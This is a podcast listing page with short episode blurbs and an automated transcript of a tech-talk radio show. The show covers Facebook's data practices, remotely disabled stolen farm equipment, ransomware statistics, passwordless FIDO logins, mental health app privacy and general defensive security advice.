GCP Podcast Episode 292: Pulumi and Kubernetes Releases with Kat Cosgrove podcast
Optimize and scale your startup on Google Cloud: Introducing the Build Series blog
Interview
Kubernetes site
GKE site
Autoscaling with GKE: Overview and pods video
GKE release schedule docs
Release channels docs
Upgrade-scope maintenance windows docs
Configure cluster notifications for third-party services docs
Cluster notifications docs
Pub/Sub site
Agones site
What's something cool you're working on?
Kaslin is working on KubeCon and new episodes of GKE Essentials.
Hosts
Mark Mirchandani and Kaslin Fields

Azure Friday (HD) - Channel 9
Azure SQL Database: An introduction to temporal tables

Azure Friday (HD) - Channel 9

Play Episode Listen Later May 20, 2022


If you are familiar with the Event Sourcing and CQRS patterns, then you know that they are extremely powerful, but can be quite complex to implement correctly. Davide Mauri joins Lara Rubbelke to show temporal tables give you the same benefits without the related challenges. Chapters 00:00 - Introduction 01:28 - Demo using temporal tables 06:11 - Demo using 'as of' 07:36 - Demo for a range of time 08:32 - Wrap-up Recommended resources Getting started with temporal tables Configure temporal retention policy Azure SQL Database Create a Pay-as-You-Go account (Azure) Create a free account (Azure) Connect Twitter: Lara Rubbelke | @SQLGal Twitter: Davide Mauri | @MauriDB Twitter: Azure Friday | @AzureFriday

Azure Friday (Audio) - Channel 9
Azure SQL Database: An introduction to temporal tables

Azure Friday (Audio) - Channel 9

Play Episode Listen Later May 20, 2022


If you are familiar with the Event Sourcing and CQRS patterns, then you know that they are extremely powerful, but can be quite complex to implement correctly. Davide Mauri joins Lara Rubbelke to show temporal tables give you the same benefits without the related challenges. Chapters 00:00 - Introduction 01:28 - Demo using temporal tables 06:11 - Demo using 'as of' 07:36 - Demo for a range of time 08:32 - Wrap-up Recommended resources Getting started with temporal tables Configure temporal retention policy Azure SQL Database Create a Pay-as-You-Go account (Azure) Create a free account (Azure) Connect Twitter: Lara Rubbelke | @SQLGal Twitter: Davide Mauri | @MauriDB Twitter: Azure Friday | @AzureFriday

Craig Peterson's Tech Talk
Facebook Has No Idea Where Your Data Is and What They Do With It?!

Craig Peterson's Tech Talk

Play Episode Listen Later May 13, 2022 82:20


Facebook Has No Idea Where Your Data Is and What They Do With It?! Facebook's about 18 years old coming on 20 Facebook has a lot of data. How much stuff have you given Facebook? Did you fall victim for that? Hey, upload your contacts. We'll find your friends. They don't know where your data is. [Following is an automated transcript] [00:00:15] This whole thing with Facebook has exploded here lately. [00:00:20] There is an article that had appeared on a line from our friends over at, I think it was, yeah. Let me see here. Yeah. Yeah. Motherboard. I was right. And motherboards reporting that Facebook doesn't know what it does with your data or. It goes, no, there's always a lot of rumors about different companies and particularly when they're big company and the news headlines are grabbing your attention and certainly Facebook can be one of those companies. [00:00:57] So where did motherboard get this opinion about Facebook? Just being completely clueless about your personal. It tamed from a leaked document. Yeah, exactly. So we find out a lot of stuff like that. I used to follow a website about companies that were going to go under and they posted internal memos. [00:01:23] It basically got sued out of existence, but there's no way that Facebook is going to be able to Sue this one out of existence because they are describing this as. Internally as a tsunami of privacy regulations all over the world. So Gores, if you're older, we used to call those tidal waves, but think of what the implication there is of a tsunami coming in and just overwhelming everything. [00:01:53] So Facebook, internally, their engineers are trying to figure out, okay. So how do we deal with. People's personal data. It's not categorized in ways that regulators want to control it. Now there's a huge problem right there. You've got third party data. You've got first party data. You've got sensitive categories, data. 
[00:02:16] They might know what religion you are, what your persuasions are in various different ways. There's a lot of things they might know about you. How are they all categorized? Now we've got the European Union with their General Data Protection Regulation, the GDPR we talked about when it came into effect back in 2018, and I've helped a few companies to comply with that. [00:02:41] That's not my specialty. My specialty is the cybersecurity. But in Article 5, this European law mandates that personal data must be collected for specified, explicit and legitimate purposes and not further processed in a manner that is incompatible with those purposes. So what that means is that every piece of data, like where you are using Facebook or your religious orientation, can only be collected and used for a specific purpose and not reused for another purpose. [00:03:19] As an example here, that Vice has given in the past, Facebook took the phone number that users provided to protect their accounts with two factor authentication and fed it to its people feature as well as advertisers. Yeah. Interesting. Hey, so Gizmodo with the help of academic researchers caught Facebook doing this, and eventually the company had to stop the practice because, and this goes back to the earlier days where Facebook would say, Hey, find out if your friends are on Facebook, upload your contacts right now. [00:03:54] And most people. What did you know back then about trying to keep your data private, to try and stop the proliferation of information about you online then? Nothing. I think I probably even uploaded it back then thinking it'd be nice to see if I got friends here. We can start chatting, et cetera.
[00:04:12] According to legal experts that were interviewed by Motherboard, who wrote this article and has a copy of the internal memo, this European regulation specifically prohibits that kind of repurposing of your phone number, of trying to put together the social graph, and the leaked document shows that Facebook may not even have the ability to limit [00:04:37] how it handles users' data. Now I was on a number of radio stations this week, talking about this. And the example I gave is just look at an average business from the time it started. Facebook started how, right? Wildly scraping pictures of young women off of Harvard University's main catalog, contact page, and then asking people what do you think of this? This person, that person. And off they go, trying to rate them. Yeah. Yeah. All that matters to a woman, at least to Courtney, to Mark Zuckerberg girl, all that matters about a woman is how she looks. Do I think she's pretty or not? [00:05:15] It's ridiculous. What he was doing. It just, oh, that's Zuckerberg who he is, not a great guy anyways. So you go from stealing pictures of young ladies, asking people to rate them, putting together some class information and stuff there at Harvard, and then moving on to other universities and then opening it up even wider and wider. [00:05:42] And of course, that also created demand because you can't get on if you're not at one of the universities that we have set it up for. And then you continue to grow. You're adding these universities, certainly starting to collect data and you are making more money than God. So what do you do? You don't have to worry about any efficiencies. [00:06:02] I'll tell you that. Right? One thing you don't have to do is worry about gee, we've got a lot of redundant work going on here. We've got a lot of teams working on basically the same thing. No, you've got more money than you can possibly shake a stick at. So now you go ahead and send that money to this group or that group.
[00:06:24] And they put together all of the basic information, that they want. Pulling it out of this database and that database in there doing some correlation, writing some really cool CQL queries with mem credible joins and everything else. And now that becomes part of the main code for Facebook. [00:06:45] And then Facebook goes on to the next little project and they do the same thing. Then the next project, then the next project. And then someone comes along and says, Hey, we. This feature, that feature for advertisers and then in that goes, and then along comes candidate Obama. And they, one of the groups inside Facebook says, yeah here we go. [00:07:09] Here's all of the information we have about everybody and it's free. Don't worry about it. And then when Trump actually bought it and hired a company to try and process some of that information he got in trouble. No but the. The whole campaign could get access to anything they wanted to, again, because the data wasn't controlled, they had no idea who was doing what with the data. [00:07:34] And according to this internal memo, they still don't know. They don't even know if they can possibly comply with these regulations, not just in Europe, but we have regulations in pretty much all of the 50 states in the U S Canada of course, has their own Australia and New Zealand think about all the places. [00:07:57] Facebook makes a lot of. So here's a quote from that we build systems with open borders. The result of these open systems and open culture is well-described with an analogy. Imagine you hold a bottle of ink in your hand, the bottle of ink is a mixture of all kinds of user data. You pour that ink into a lake of water and K and it flows every year. [00:08:22] The document read. So how do you put that ink back in the bottle? I, in the right bottle, how do you organize it again? So that it only flows to the allowed places in the lake? They're totally right about that. Where did they collect it from? 
Apparently they don't even know where they got some of this information. [00:08:43] This data from reminds me of the no fly list. You don't know you're on it and you can't get yourself off of it. It's crazy. So this document that we're talking about, it was written last year by. Privacy engineers on the ad and business product team, whose mission is to make meaningful connections between people and businesses and which quote sits at the center of our monetization strategy. [00:09:06] And is the engine that powers Facebook's growth. Interesting. Interesting problems. And I see this being a problem well into the future for more and more of these companies, look at Twitter as an example that we've all heard about a lot lately. And then I've talked about as well along comes Elon Musk and he says wait a minute. [00:09:29] I can make Twitter way more profitable. We're going to get rid of however many people over a thousand, and then we are going to hire more people. We're going to start charging. We're going to be more efficient. You can bet all of these redundancies that are in Facebook are also there. And Twitter also has to comply with all of these regulations that Facebook is freaking out about it for a really a very good reason. [00:10:00] So this document is available to anybody who wants to look at it. I'm looking at it right now, talking about regulatory landscape and the fundamental problems Facebook's data lake. And this is a problem that most companies have not. As bad as Facebook does the button. Most companies you write, you grow. I have yet to walk into a business that needs help with cybersecurity and find everything in place as it should be because it grew organically. [00:10:32] Do you started out with a little consumer firewall router, wifi, and then you added to it and you put a switch here and you added another switch behind that and move things around. This is normal. 
This is not total incompetence on the part of the management, but my gosh, I don't know. Maybe they need an Elon Musk. [00:10:52] Just straighten them out as well. Hey, stick around. I'll be right back and sign up online@craigpeterson.com. [00:11:02] Apparently looting is one of the benefits of being a Russian soldier. And according to the reports coming out of Ukraine, they've been doing it a lot, but there's a tech angle on here that is really turning the tables on these Russian Looters. [00:11:19] We know in wars, there are people that loot and typically the various militaries try and make sure, at least recently that looting is kept to an absolute minimum. [00:11:32] Certainly the Americans, the British, even the Nazis during world war II the the socialists they're in. Germany they tried to stop some of the looting that was going on. I think that's probably a very good thing, because what you end up with is just all of these locals that are just totally upset with you. [00:11:57] I found a great article on the guardian and there's a village. I hadn't been occupied for about a month by Russian troops and the people came back. They are just shocked to see what happened in there. Giving a few examples of different towns. They found that the alcohol was stolen and they left empty bottles behind food wrappers, cigarette butts, thrown all over the place in apartments in the home. [00:12:26] Piles of feces blocking the toilets, family photographs torn, thrown around the house. They took away all of the closes as a code from one of the people, literally everything, male and female coats, boots, shirts, jackets, even my dresses and laundry. This is really something. The Sylvia's didn't do this, but now Russia. [00:12:49] The military apparently does. 
So over the past couple of weeks, there has been reporting from numerous places where Russian troops had occupied Ukrainian territory, and the Guardian, which is this UK newspaper, collected evidence to suggest looting by Russian forces was not merely a case of a few wayward soldiers, but a systematic part of Russian military behavior across multiple towns

[00:13:17] and villages. That's absolutely amazing. Another quote here: people saw the Russian soldiers loading everything onto their old trucks, everything they could get their hands on. A dozen houses on the village's main street had been looted, as well as the shops. Other villagers reported losing washing machines, food, laptops, even a sofa, an air conditioner,

[00:13:41] being shipped back, just like you might use UPS here, or they have their equivalent over there. A lady here who was the head teacher in the school, she came back in, of course, found her home looted, and in the head teacher's office she found an open pair of scissors that had been jammed into a plasma screen that was left behind, because if they can't steal it, they're going to destroy it.

[00:14:07] They don't wanna leave anything behind. They found the Russians had taken most of the computers, the projectors and other electronic equipment. It's incredible. So let's talk about the turnaround here. You might've heard stories about some of these bad guys that have smashed and grabbed their way into Apple stores.

[00:14:27] So they get into the Apple store. They grab laptops and iPads, no longer iPods, because they don't make those anymore, and iPhones. And they take them and they run with them. Nowadays there's not a whole lot of use for those. Now what they have been doing, some of these bad guys, is they'd take some parts and use them in stolen equipment.

[00:14:52] They sell them on the used market, et cetera. But when you're talking about something specific, like an iPhone that needs specific activation,
a completely different problem arises for these guys, because that iPhone needs to have a SIM card in order to get onto the cell network. And it also has built-in serial numbers.

[00:15:15] So what happens in those cases? Well, Apple goes ahead and disables them. So as soon as they connect to the internet, let's say they put them on Wi-Fi. They don't get a SIM card. They don't get service from T-Mobile or Verizon or whoever it might be. So now they just connect to the Wi-Fi and it calls home,

[00:15:33] 'cause it's going to get updates and download stuff from the App Store, and they find that it's been bricked. Now you can do that with a lot of mobile device managers that are available for all kinds of equipment nowadays, but certainly Apple equipment, where if a phone is lost or stolen, or a laptop or other pieces of equipment, you can get on the MDM and disable it, have it remotely erase, et cetera.

[00:16:00] Now, police have had some interesting problems with that, because a bad guy might go ahead and erase a smartphone that's in the evidence locker at the police station. So they're doing things like putting them into Faraday cages or static bags or other things to try and stop that. So I think we've established here that the higher-tech equipment is pretty well protected.

[00:16:25] You steal it, it's not going to do you much good. So one of the things the Russians stole when they were in, it's called, I think you pronounce it Melitopol, which is again a Ukrainian city, is they stole all of the equipment from a farm equipment dealership and shipped it to Chechnya. Now that's according to a source, a businessman in the area, that CNN is reporting on.

[00:16:56] So they shipped this equipment. We're talking about combine harvesters worth 300 grand apiece. They shipped it 700 miles. And the thieves were ultimately unable to use the equipment because it had been locked remotely.
So think about agriculture equipment that John Deere, in this case, these pieces of equipment, they drive themselves.

[00:17:23] It's autonomous. It goes up and down the field, goes in any pattern that you want it to. It'll bring itself within a foot or an inch of your boundaries, of your property, being very efficient the whole time, whether it's planting or harvesting, et cetera. And that's just a phenomenal thing, because it saves so much time for the farmer, makes it easier to do. The companies like John Deere

[00:17:49] want to sell as many pieces of this equipment as they possibly can. And farming is known to be a, what, not terribly profitable business, and certainly isn't like Facebook. So how can they get this expensive equipment into the hands of a lot of farmers? What they do is they use leases. So you can lease the equipment through a leasing company or maybe directly from the manufacturer, and now you're off and running.

[00:18:16] But what happens if the lease isn't paid? Now, it's one thing if you don't pay your lease on a $2,000 laptop, right? They're probably not going to come hunting for you, but when you're talking about a $300,000 harvester, they're more interested. So the leasing company has title to the equipment, and the leasing company can shut it off remotely.

[00:18:41] You see where I'm going with this? So that they can get their equipment in the hands of more farmers, because the farmers can lease it. It costs them less. They don't have to have a big cash payment. You see how this all works. So when the Russian forces stole this equipment, that's valued, total value here is about $5 million,

[00:19:02] they were able to shut it all off. And obviously, if you can't start the engine, because it's all shut off, and it's all run by computers nowadays, and there's pros and cons to that. I think there's a lot of cons, but what are you going to do? How's that going to work for you? It isn't going to work for you.
[00:19:22] And they were able to track it and had GPS trackers, find out exactly where it was. That's how they know it was taken to Chechnya and could be controlled remotely. And in this case, how did they control it? They completely shut it off. Even if they sell the harvesters for spare parts to earn some money, they sure aren't gonna be able to sell them for the 300 grand that they were actually worth.

[00:19:48] Hey, stick around. We'll be right back, and visit me online at craigpeterson.com. If you sign up there, you'll be able to get my insider show notes. And every week I have a quick training right there in the emails. craigpeterson.com.

[00:20:05] If you've been worried about ransomware, you are right to worry. It's up. It's costly. And we're going to talk about that right now. What are the stats? What can you do? What happens if you do get hacked? Interesting world!

[00:20:20] Ransomware has been a very long-running problem. I remember a client of ours, a car dealership, who we had gone in,

[00:20:31] we had improved all of their systems and their security, and one of their people, who was actually a senior manager, ended up downloading a piece of ransomware, one of these encrypted ones, and opened it up, and his machine all of a sudden, guess what, it had ransomware on it. One of those big screens that say, pay up and send us this much Bitcoin, and here's our address.

[00:21:00] All of that sort of stuff. And he called us up and said, what's going on here? What happened? First of all, don't bring your own machine into the office. Secondly, don't open up, particularly, encrypted files using a password that they gave. And thirdly, we stopped it automatically. It did not spread.

[00:21:20] We were able to completely restore his computer. Now let's consider here the consequences of what happened. So he obviously was scared. And within a matter of a couple of hours, we actually had him back to where he was, and it didn't spread.
So the consequences there, they weren't that bad. But how about if it had gotten worse?

[00:21:47] How about if the ransomware also, before it started holding his computer ransom, went out and found all of the data about their customers? What do you think, an auto dealership would love to hear that all of their customer data was stolen and released, all of the personal data of all of their customers?

[00:22:08] Obviously not. So there's a potential cost there. And then how long do you think it would take a normal company that thinks they have backups to get back online? All I can tell you, it'll take quite a while, because the biggest problem is most backups don't work. We have yet to go into a business that was actually doing backups that would work to help restore them.

[00:22:35] And if you're interested, I can send you, I've got something I wrote up. I'd be glad to email it back to you. Obviously, as usual, no charge. And you'll be able to go into that and figure out what you should do, 'cause I break it down into the different types of backups and why you might want to use them or why you might not want to use them. But ransomware

[00:22:58] is a kind of a pernicious, nasty little thing, particularly nowadays, because it's two-factor. First is they've encrypted your data. You can't get to it. And then the second side of that is, okay, I can't get to my data, and now they're threatening to hold my data ransom or they'll release it. So they'll put it out there.

[00:23:22] And of course, if you're in a regulated industry, which actually car dealers are, because they deal with financial transactions, leases, loans, that sort of thing, you can lose your license for your business. You can lose your ability to go ahead and, frankly, make loans and work with financial companies and financial instruments.

[00:23:45] It could be a very big.
So there are a lot of potential things that can happen, all the way from losing your reputation as a business or an individual to losing all of the money in your operating account. And again, we've got a client that we picked up afterwards that, yes indeed, lost all of the money in their operating account.

[00:24:09] And then how do you make payroll? How do you do things? There's a new study that came out from Check Point. Check Point is one of the original firewall companies, and they had a look at ransomware. What are the costs of ransomware? Now, bottom line, I'm looking at some stats here on a couple of different sites.

[00:24:29] One is, by the way, Conti, which is a big ransomware gang that also got hacked after they said we are going to attack anyone that doesn't defend Putin's invasion of Ukraine, and then they got hacked and their information was released. But here's ransomware statistics. This is from Cloudwards. First of all, the largest ransom demand is $50 million.

[00:24:55] And that was in 2021, to Acer, big computer company. 37% of businesses were hit by ransomware in 2021. This is amazing. They're expecting by 2031, so in about a decade, ransomware is going to be costing about $265 billion a year. Now on average, ransomware costs businesses $1.85 million to recover from an attack.

[00:25:25] Now that's obviously not a one- or two-person place, but think of the car dealer again. How much money are they going to make over the year or over the life of the business? If you're a car dealer, you have a license to print money, right? You're selling car models, or cars, from manufacturers. And now you have the right to do that, and they can remove that.

[00:25:48] How many tens, hundreds of millions of dollars might that end up costing you? Yeah. Big deal. Total cost of ransomware last year, $20 billion. Now these are the interesting statistics here right now. So pay closer attention to this: 32% of ransomware victims paid a ransom.
So about a third paid the ransom demand.

[00:26:12] Lastly, it's actually down, because my recollection is it used to be about 50% would pay a ransom. Now on average, that one third of victims that paid a ransom only recovered 65% of their data. Now that differs from a number I've been using from the FBI. That's a little bit older, that was saying it ends at a little better than 50%, but 65% of paying victims recovered their data.

[00:26:41] Now isn't that absolutely amazing. Now 57% of companies were able to recover their data using a cloud backup. Now think about the different types of backup. Cloud backup is something that can work pretty well if you're a home user, but how long did it take for your system to get back? Probably took weeks, right?

[00:27:05] For a regular computer over a regular internet line. Now restoring from backups is going to be faster, because your downlink is usually faster than your uplink. That's not true for businesses that have real internet service like ours. It's the same bandwidth up as it is down. But it can take, again, days or weeks to try and recover your machine.

[00:27:28] So it's very expensive. And I wish I had more time to go into this, but looking at the costs here and the fact that insurance companies are no longer paying out for a lot of these ransomware attacks, it could be incredibly expensive for you. Incredibly. The number one business types by industry for ransomware attacks: retail.

[00:27:59] That makes sense, doesn't it. Real estate, electrical contractors, law firms and wholesale building materials. Isn't that interesting? And that's probably because none of these people are really aware or conscious of doing what, of keeping their data secure, of having a good IT team, a good IT department.

[00:28:24] So there's your bottom line. Those are the guys that are getting hit the most. The numbers are increasing dramatically, and your costs are not just in the money you might pay as a ransom.
And as it turns out, in pretty much every case, prevention is less expensive and much better than the cure of trying to pay ransom or trying to restore from backups.

[00:28:52] Hey, you're listening to Craig Peterson. You can get my weekly show notes by just going to craigpeterson.com.

[00:29:00] You and I have talked about passwords before, the way to generate them and how important they are. We'll go over that again a little bit in just a second, but there's a new standard out there that will eliminate the need for passwords.

[00:29:16] Passwords are a necessary evil, at least they have been forever. I remember, I think the only system I've ever really used that did not require passwords was the IBM 360.

[00:29:31] Yeah, 360, you punch up the cards, all of the JCL, you feed the card deck in and off it goes. And does this little thing. That was a different day, a different era. When I started in college, in university, we had remote systems, timeshare systems that we could log into. And there weren't much in the line of password requirements.

[00:29:58] But you had a username, you had a simple password. And I remember one of our instructors, his name was Robert Andrew Lang, and his password was always some sort of a combination of RA Lang. So it was always easy to guess what his password was. Today it has gotten a lot worse. Today we have devices with us all the time.

[00:30:22] You might be wearing a smartwatch that requires a password. You of course probably have a smartphone that also may be requiring a password, certainly after it boots. Nowadays they use fingerprints or facial recognition, which is handy, but it has its own drawbacks. But how about the websites you're going to, the systems you're using when you're at work and logging in?

[00:30:49] They all require passwords and usernames of some sort or another. Well, Apple, Google, and Microsoft have all committed to expanding their support for a standard that's actually been out there for a few years.
It's called the FIDO standard. And the idea behind this is that you don't have to have a password in order to authenticate.

[00:31:15] Now that's really an interesting thing, right? Just looking at it, because we're so used to having this password-only authentication. And of course the thing to do there is to make sure you have, for your password, multiple words in the password. It should really be a passphrase. And between the words, put in special characters or numbers, maybe

[00:31:41] upper, lowercase a little bit in those words. Those are the best passwords, 20 characters, 30 characters long. And then if you have to have a PIN, I typically use a 12-digit PIN. And how do I remember all of these? 'Cause I use a completely different password for every website. And right now, let me pull it up,

[00:32:03] I'm using 1Password.com's password manager. And my main password for that is about 25 characters long. And I have three thousand one hundred and thirty-five entries here in my password manager. 3,100, that is a whole lot of passwords, right? As well as software licenses and a few other things in there.

[00:32:30] That's how we remember them, is using a password manager. 1Password.com is my favorite. Now, obviously I don't make any money by referring you there. I really do like that. Some others that I've liked in the past include LastPass, but they really messed up with some of their cybersecurity last year, and I lost my faith in it.

[00:32:51] So now what they're trying to do is make these websites that we go to, as well as some apps, have a consistent, secure, and passwordless sign-in. And they're going to make it available to consumers across all kinds of devices and platforms. That's why you've got Apple, Google, and Microsoft all committing to it.

[00:33:15] And you can bet everybody else is going to follow along, because there's hundreds of other companies that have decided they're going to work with the FIDO Alliance, and they're going to create this passwordless future.
Which I like, this idea. So how does this work? Basically you need to have a smartphone.

[00:33:33] This is, I'm just going to go with the most standard way that this is going to work here in the future, and you can then have a passkey. This is like a multi-factor authentication or two-factor authentication. So for instance, right now, when I sign into a website online, I'm giving a username, giving a password, and then it comes up and it asks me for a code.

[00:33:57] So I enter in a six-digit code, and that code changes every 30 seconds. And again, I use my password manager from 1Password in order to generate that code. So that's how I log into Microsoft sites and Google sites and all kinds of sites out there. So it's a similar thing here. Now, for the sites for my company, because we do cybersecurity for businesses, including regulated businesses,

[00:34:24] we have biometrics tied in as well. So to log into our systems, I have to have a username. I have to have a password. I then am sent to a single sign-on page where I have to have a message sent to my smart device, that then has a special app that uses biometrics, either a Face ID or a fingerprint, to verify who I am.

[00:34:49] Yeah, there's a lot there, but I have to protect my customers. Something that very few, it's crazy, actual managed security services providers do, but it's important, right? By the way, if you want my password special report, just go to craigpeterson.com. Sign up for my email list. I'll send that to you.

[00:35:13] That's what we're sending out right now for anyone who signs up new at craigpeterson.com. And if you'd like a copy of it and you're already on the list, just go ahead and email me at craigpeterson.com and ask for the password special report, where I go through a lot of this sort of thing. So what will happen with this is you go to a website, and it might come up with a QR code.

[00:35:37] So you then scan that QR code with your phone and verify it, authorize it on your phone.
You might again have it set up so that your phone requires a facial recognition, or perhaps it'll require a fingerprint. And now you are in. Which is very cool. They fixed some security problems in FIDO over the last few years, which is great. Over the coming year,

[00:36:02] you're going to see this available on Apple devices, Google, Microsoft platforms, and it really is simple, stronger authentication. That's sort of what FIDO calls it. But it is going to make your life a lot easier. It is a standard, and the passwordless future makes a whole lot of sense for all of us. Now, I want to talk about another thing here that just bothered me for a long time.

[00:36:30] I have a sister who is in the medical field and gives prescriptions, doctor thing. And I think she's not quite a doctor. I can't remember what she has. She's an LPN or something. And anyhow, so she'll get on a Zoom call with someone and they'll go through medical history and what's happening right now, and she'll make prescriptions.

[00:36:57] And so I warned her about that, saying it is very bad to be using Zoom, because Zoom is not secure. Never has been, probably never will be, right. If you want secure, go and pay for it from one of these providers like WebEx. That's what we use. We have a version of WebEx that is set up to be secure.

[00:37:20] So I talked to her about that and said, hey, listen, you can't do this. You've really got to go another way here. And so she started using one of these mental, or medical health apps. What I want to talk about right now specifically are some checks that were just performed, some audits on mental health apps.

[00:37:45] That's why I messed up a second ago, but what they looked at is that things are a serious problem there. And in fact, Threatpost is just calling it, frankly, just plain old creepy. So they've got some good intentions. They want to help with mental health. You've probably seen these, or at least heard them advertised.
[00:38:06] So you can get on the horn with a mental health professional, a doctor or otherwise, in order to help you here with your psychological or spiritual wellness. And people are sharing their personal and sensitive data with third parties. And of 32 mental health and prayer mobile apps that were investigated by the open source organization,

[00:38:32] 28, 28 of the 32 were found to be inherently insecure and were given a Privacy Not Included label, including others here. So this is a report that was released here by the open source organization tied into Mozilla. Those are the Firefox people. They have what they call their minimum security standards,

[00:38:56] so things like requiring strong passwords, managing security updates and vulnerabilities, et cetera. 25 of the 32 failed to meet even those minimum security standards. So these apps are dealing with some of the most sensitive mental health and wellness issues people can possibly have, right? Depression, anxieties, suicidal thoughts, domestic violence, eating disorders.

[00:39:23] And they are being just terrible with your security. Mozilla researchers spent 255 hours, or about eight hours per product, peering under the hood of the security, watching the data that was going back and forth, right, between all of these mental health and prayer apps. It was just crazy. So for example, eight of the apps reviewed allowed weak passwords, that range

[00:39:52] from one digit, 1, as the password to 1, 1, 1, 1, while a mental health app called Moodfit only required one letter or digit as a password. Now that is very concerning for an app that collects mood and symptom data. So be very careful. Two of the apps, BetterHelp, a popular app that connects users with therapists, and Better Stop Suicide, which is of course a suicide prevention app, have vague and messy, according to Mozilla, privacy policies that have little or no effect on actual

[00:40:30] user data protection. So be very careful.
And if you're a mental health professional or medical professional, don't just go and use these open video calls, et cetera, et cetera. Find something good. And there are some standards out there. Again, visit me online, get my insider show notes every week. Get my little mini trainings.

[00:40:56] And they come up most weeks. Just go to craigpeterson.com and I'll send you my special report on passwords and more.

[00:41:06] We know the Russians have been attacking us. I've talked a lot about it on the radio station, all kinds of stations, in fact, here over the last couple of weeks, and I am doing something special. We are going through the things you can do to keep safe.

[00:41:23] Last week we started doing something I promised we would continue.

[00:41:27] And that is, how can you protect yourself when it comes to the Russians, right? When it comes to the bad guys, because the Russians are definitely the bad guys. There's a few things you can do. And there's a few things, frankly, you shouldn't be doing. And that's exactly what we're going to talk about right now.

[00:41:45] So last week we went over some steps, some things that you can look at, that you should look at, that are going to help protect you. And we are going to go into this a whole lot more today. And so I want you to stick around, and if you miss anything, you can go online. You can go to craigpeterson.com. Make sure you sign up there for my email.

[00:42:08] And what I'm going to do for you is send you a few different documents. Now, where we can chat back and forth about it, but I can send you this. Now I'm recording this on video as well as on audio, so you can follow along if you're watching either on YouTube or over on Rumble, and you can find it also on my website.

[00:42:32] I've been trying to post it up there too, but right now let's talk about what we call passive backend protections. So you've got the front end, and the front end, of course, is
stuff coming at you, maybe to the firewall. I mentioned last week about customers of mine. I was just looking at a few customers this week, just so I could have an idea of their firewalls.

[00:42:59] And they were getting about 10 attacks per minute. Yeah. And these were customers who have requirements from the Department of Defense because they are defense subcontractors. So again, potential bad guys. So I looked up their IP addresses and where the attacks were coming from. Now, remember, that doesn't mean where they originated, because the bad guys can hop through multiple machines and then get onto your machine.

[00:43:28] What it means is that ultimately they ended up coming from one machine, right? So there's an IP address of that machine that's attacking my clients or attacking my machines. That just happens all the time. A lot of scans, but some definite attacks where they're trying to log in using SSH.

[00:43:48] And what I found is these were coming from Slovakia, Russia, and Iran. Kind of what you were expecting, right? The Iranians, they just haven't given up yet. They keep trying to attack, particularly our military and our industry. One of the things we found out this week from, again, this was an FBI notice, is that the Russians have been going after our industrial base.

[00:44:15] And that includes, in fact, it's more specifically, our automobile manufacturers. We've already got problems, right? Try buying a new car, try buying parts. I was with my friend, just this. I helped him because he had his car, right, needed to get picked up. So I took him over to pick up his car, and we chatted a little bit with this small independent automotive repair shop.

[00:44:40] And they were telling us that they're getting sometimes six, eight week delays on getting parts, and some parts they just can't get. So they're going to everything from junkyards on out, and the worst parts are the parts, the official parts from the car manufacturers.
So what's been happening is Russia apparently has been hacking into these various automobile manufacturers and automobile parts manufacturers.

[00:45:10] And once they're inside, they've been putting in a remote control botnet. And those botnets now have the ability to wake up when they want them to wake up. And then once they've woken up, what do they do? Who knows? They've been busy erasing machines, causing nothing but havoc. They've been doing all kinds of stuff in the past. Today, they're sitting there.

[00:45:31] Which makes you think they're waiting. It's accumulate as much as you possibly can, and then once you've got it all accumulated, go ahead and attack. So they could control thousands of machines, but they're not just in the US. It's automobile manufacturers in Japan that we found out about.

[00:45:50] So that's what they're doing right now. So you've got the kind of that front end and back end protections. So we're going to talk a little bit about the back end. What does that mean when a cybersecurity guy talks about the backend and the protections? I got it up on my screen right now, but here's the things you can do.

[00:46:10] Okay. Remember, small businesses are just getting nailed from these guys, because again, they're fairly easy targets. One, change your passwords, right? How many times do we have to say that? And yet about 70% of businesses out there are not using a good password methodology. If you want more information on passwords, two-factor authentication, you name it,

[00:46:37] just email me, me@craigpeterson.com. I want to get the information out now. You've got to make sure that all of the passwords on your systems are encrypted, are stored in some sort of a good password vault. You really should be looking at 256-bit encryption or better. I have a vendor that I use. So if you get my emails every week, with them, there's the little training.

[00:47:06] And so I'll give you a five-minute training.
It's written, usually it's in bullet point form. I'm just trying to help you understand things. That provider of mine has a big database, and there's another provider that I use that is for training. So the training guys use the database of my provider.

[00:47:27] In using that database, they're storing the passwords, and the training provider is putting passwords in the clear into the database, which is absolutely crazy. So again, if you're a business, if you're storing any sort of personal information, particularly passwords, make sure that you're using good encryption, and you're, what's called, salting the hash, which means

[00:47:53] you're not really storing the password, just storing a salted hash. I can send you more on this if you are a business and you're developing software. That's, this is long-tail stuff here. Configure all of the security password settings so that if someone's trying to log in and is failing, then you block it. Many of us, let's say you're a small business,

[00:48:15] I see this all of the time. Okay. You're not to blame, but you have a firewall that came from the cable company. Maybe you bought it at a big box retailer. Maybe you bought it online over at Amazon. Is it really great for you? Has it got settings on there that let you say, there's 20 attempts to log in,

[00:48:38] maybe we should stop them? Now, what we do personally for our customers is typically we'll block them at somewhere around three or four failed attempts, and then their passwords block. Now you can configure that sort of thing if you're using email. And that's an important thing to do, let me tell you, because we've had some huge breaches due to email, like Microsoft email and passwords and people logging in and stealing stuff.

[00:49:06] It was just a total nightmare for the entire industry last year, but limit the number of login retries as well while you're in there.
These excessive login attempts, or whatever you want to define it as, need to lock the account. And what that means is even if they have the right password, they can't get in, and you have to use an administrative password in order to get in.

[00:49:31] You also want to, what's called, throttle the rate of repeated logins. Now you might've gotten caught on this, right? You went to your bank, you went to eBay, you went to any of these places, and all of a sudden it denied you, right? It blocked you. That can happen when your account is on these hackers' lists.

[00:49:51] You remember last week we talked about password spraying? Well, that's a very big deal, and hackers are doing the spraying trick all of the time, and that is causing you to get locked out of your own account. So if you do get locked out, remember, it might be because someone's trying to break in. Obviously you have to enforce the policies.

[00:50:16] The CAPTCHA is a very good thing. Again, this is more for software developers. We always recommend that you use multi-factor or two-factor authentication. Okay. Do not use your SMS, your text messages, for that, where they'll send you a text message to verify who you are. If you can avoid that, you're much better off,

[00:50:36] 'cause there's some easy ways to get around that for hackers that are determined. Okay. A multi-factor, again. Install an intrusion detection system. We put it right at the network edge and between workstations and servers, even inside the network. We put detection systems that look for intrusion attempts and block intrusion attempts.

[00:51:02] Very important: use deny lists to block known attackers. We build them automatically. We use some of the higher-end Cisco gear. Cisco is a big network provider. They have some of the best hardware and software out there, and you have to subscribe. A lot of people complain, I'm going to just go buy a firewall for 200 bucks on Amazon.
[00:51:24] Why would I pay that much a month just to have a Cisco firewall? And it's like paying for the brand. I've got my logo shirt on here. Oh, I wouldn't pay for that. No, it's because they are automatically providing block lists that are updated by the minute sometimes. And then make sure you've got an incident response plan in place.
